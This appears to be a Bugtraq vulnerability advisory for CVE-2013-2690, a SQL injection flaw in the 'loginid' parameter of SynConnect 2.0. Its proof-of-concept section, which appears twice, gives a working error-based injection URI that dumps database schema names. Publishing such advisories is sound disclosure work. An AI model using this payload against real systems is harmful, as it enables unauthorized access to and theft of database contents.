SynConnect 'loginid' Parameter SQL Injection Vulnerability
BID:58711
Info
SynConnect 'loginid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 58711 |
| Class: | Input Validation Error |
| CVE: |
CVE-2013-2690 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 25 2013 12:00AM |
| Updated: | Apr 13 2015 09:01PM |
| Credit: | Bhadresh Patel of Cyberoam Security Research Team |
| Vulnerable: |
Synchroweb Technology SynConnect 2.0 |
| Not Vulnerable: | |
Exploit / POC
SynConnect 'loginid' Parameter SQL Injection Vulnerability
An attacker can exploit this issue using a browser.
The following example URI is available:
http://www.example.com/index.php?func=logoff&loginid=1011' AND (SELECT 8975 FROM(SELECT COUNT(*),CONCAT((SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bhdresh'='bhdresh
An attacker can exploit this issue using a browser.
The following example URI is available:
http://www.example.com/index.php?func=logoff&loginid=1011' AND (SELECT 8975 FROM(SELECT COUNT(*),CONCAT((SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bhdresh'='bhdresh